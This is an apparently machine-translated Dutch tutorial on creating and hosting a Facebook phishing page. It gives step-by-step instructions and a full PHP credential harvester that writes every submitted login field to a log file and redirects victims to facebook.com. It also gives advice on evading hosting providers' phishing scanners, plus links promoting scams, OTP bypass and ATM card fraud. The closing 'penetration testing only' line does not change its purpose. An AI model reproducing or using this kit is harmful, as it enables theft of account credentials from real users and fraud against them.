inhoudsopgave:
Hoe maak ik een Facebook phishing link
onlangs heb ik veel handleidingen gevonden over het maken van phishing-pagina ‘ s. Hoewel de principes achter elke gids is vergelijkbaar, de meeste van de hosting oplossingen in de gids werkt niet meer als gevolg van een toename van het hardhandig optreden van phishing-pagina ‘ s door de hosting bedrijven. In deze gids, Ik zal gaan door elke stap die nodig is om te maken en hosten van een phishing-pagina van uw keuze. Geniet ervan!
Download de HTML-Index van de doelpagina
om te beginnen moet u de HTML-index van de pagina verkrijgen. Er zijn verschillende methoden om dit te doen, er zijn zelfs sjablonen online voor populaire sites. In deze tutorial, Ik ga de meest elementaire manier gebruiken om zo noob-vriendelijk mogelijk te zijn.
Lees ook: een phishing-site maken met kali linux
Navigeer naar uw webpagina
In deze tutorial, Ik Ga naar phish Facebook.
de bron van de webpagina weergeven.
afhankelijk van uw browser kunnen er verschillende methoden zijn. Normaal gesproken wordt dit gedaan door met de rechtermuisknop op de site te klikken en te klikken op “View Source”. Ik heb gedaan dat op mijn browser en een windows zou moeten komen vergelijkbaar met deze:
op het vak rechts staat de bron van de website. Wat leidt naar de volgende stap:
het downloaden en opslaan van de broncode
Selecteer het vak en kopieer en plak alles in het vak naar een txt-document. Gebruik Kladblok op windows, en een eenvoudig tekstbewerkingsprogramma als u geen windows gebruikt. (Gebruik geen programma ‘ s zoals Word of Pages omdat het erg traag is). Nadat u dat hebt gedaan, klik op “Opslaan als” of welke optie die u toelaat om dat document op te slaan. Op Kladblok zou het er zo uit moeten zien:
verander “opslaan als type” in alle bestanden en verander de codering in Unicode.
daarna, naam van het document ” index.html”, uiteraard zonder de spraaktekens.
Gefeliciteerd! Je bent klaar met de eerste stap van de tutorial!
Lees ook: Hoe Facebook scam te doen zonder verbannen of geblokkeerd
les 2
een PHP-bestand maken voor het verzamelen van wachtwoorden
het PHP-bestand is in principe de tool die de gebruikers wachtwoord oogst in dit scenario. Er zijn verschillende manieren waarop je deze PHP kunt maken als je wat programmeerkennis hebt, maar als je dat niet hebt, kopieer dan gewoon mijn voorbeeld PHP.
<?php
header (‘locatie: facebook.com’);
$handle = fopen (“log.txt”, “a”);
foreach($_POST as $variabele => $waarde) {
fwrite($handle, $variabele);
fwrite($handle, “=”);
fwrite($handle, $waarde);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
afsluiten;
?>
hetzelfde als hierboven, sla het PHP-bestand op als ” alle bestanden “en als” post.php”. Wijzig de codering naar Unicode en je moet klaar zijn om te gaan!
Wijzig het HTML-bestand van de pagina om uw PHP-bestand erin op te nemen.
nu moeten we ons PHP-bestand opnemen om wachtwoorden te ontvangen die de gebruikers verzenden.
Zoek de methode voor het verzenden van wachtwoorden
eerst moet u zien hoe de website omgaat wanneer de gebruiker een gebruikersnaam-wachtwoord indient.
voor Facebook, alles wat je hoeft te doen is om Ctrl-F en typ “=action” in het veld.
nu moet u alles in het onderstreepte gedeelte vervangen door ” post.php”, houd de spraaksporen. (slechts een set alstublieft).
uiteraard zal deze methode anders zijn voor andere websites. Een goede methode om het te vinden is met behulp van inspecteer elementen tool in de meeste moderne browsers en te klikken op de login knop. Vind iets vergelijkbaar met de bovenstaande methode.
Lees ook: leer hoe je ATM-kaarten hack, machines met behulp van wizcardo-software
let op: dit moet u later wijzigen wanneer u de website daadwerkelijk host.
hosten van het PHP-bestand voor Wachtwoord opslaan
nu hier is het sappige deel, het maken van uw nep-website online, zodat andere mensen kunnen bladeren.
u kunt alle gratis hostingdiensten gebruiken om wachtwoorden te hosten en op te slaan. Echter, de hosting plan moet iets genaamd “FTP” bevatten. Voor deze tutorial, Ik zal worden met behulp van 000webhost.
Navigeer naar de FTP-Server voor uw webhosting service
bij deze stap neem ik aan dat u al een website hebt gemaakt met uw hosting service.
voor 000webhost klikt u gewoon op” File manager “en klikt u op”upload Files”. Hier is een foto van de FTP server voor 000webhost:
negeer de andere bestanden, dat zijn slechts enkele van mijn persoonlijke dingen, niet gerelateerd aan deze tutorial.
Upload uw PHP-bestanden en wijzig toestemming
zoals u kunt zien, heb ik mijn PHP-bestand al geüpload. Maar je moet het gewoon uploaden naar de hoofdmap van je FTP server. (Sommige FTP-server staat je niet toe om te uploaden naar de hoofdmap, volg gewoon hun specifieke instructies).
nu moet u de rechten wijzigen in “777”, wat in principe elke enkele rechten is. Wanneer u wordt gevraagd om vakjes aan te vinken voor de machtigingen, vink gewoon elke.
nu kunt u de FTP-server sluiten. Noteer uw webadres!
Lees ook: stap instructies om OTP-verificatie te omzeilen op Websites
die de werkelijke Phishingpagina
hosten voor deze stap moet u de exacte hostingprovider gebruiken die ik gebruik, anders wordt u verbannen.
er is een reden waarom ik niet dezelfde hostingprovider gebruik voor mijn eigenlijke pagina, en dat is omdat de meeste hostingproviders een soort van scannen zullen gebruiken om phishingpagina ‘ s te detecteren. Ik kan geprobeerd meerdere hosting diensten in het verleden en ze allemaal verboden me binnen 30 minuten van het uploaden van de index-bestand.
de post configureren.php Forum
onthoud nu, voordat je de website host, het bericht.php / login formulier wat we hierboven geconfigureerd?
u moet het aanmeldformulier opnieuw vinden in uw index.html en vervang de ” post.php “with” http://yourwebsiteforyourpostphpupload/post.php”, ervan uitgaande dat je naar de hoofdmap geüpload hebt. Vergeet niet om http:// toe te voegen voor de site. Om dit te testen, navigeer naar de website (http://yourwebsiteforyourpostphpupload/post.php) en kijk of het u doorverwijst naar Facebook.com, als dat zo is dan heb je de juiste site geplakt. Als dat niet het geval is, controleer dan dubbel of u uw bestand naar de juiste directory hebt geüpload.
Hosting van de werkelijke pagina
navigeren naar htmlpasta.com. u zult iets dergelijks zien:
vervolgens moet u de index kopiëren.html-bestand voor uw phishing-site en plak het hier.
klik nu op de re en klik op Plakken, u krijgt een link voor uw website.
Conclusie
Gefeliciteerd! Je bent klaar met het hosten van je eerste phishing site! Navigeer naar uw site en probeer een aantal valse login gegevens in te voeren, nadat u op de login knop, het moet u omleiden naar facebook.com. Log in op uw FTP-server dat u uw bericht gehost.php bestand, en er moet een nieuw document met de naam Log.txt die is opgeslagen in dezelfde map als uw bericht.php bestand. Alle inloggegevens moeten daar worden opgeslagen.
Lees ook: 2020 yahoo yahoo format, billing format, pdf download
gebruik dit niet voor kwaadaardige doeleinden, alleen te gebruiken voor penetratie testen en met toestemming van uw slachtoffer.